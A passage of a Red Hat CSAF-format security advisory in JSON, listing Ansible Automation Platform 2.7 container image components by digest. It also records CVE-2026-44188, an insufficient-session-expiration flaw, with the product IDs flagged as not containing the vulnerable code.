"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64 as a component of Red Hat Ansible Automation Platform 2.7",
"product_id": "Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.7"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Laura Pardo"
],
"organization": "Red Hat Inc.",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-44188",
"cwe": {
"id": "CWE-613",
"name": "Insufficient Session Expiration"
},
"discovery_date": "2026-05-05T15:02:26.016000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
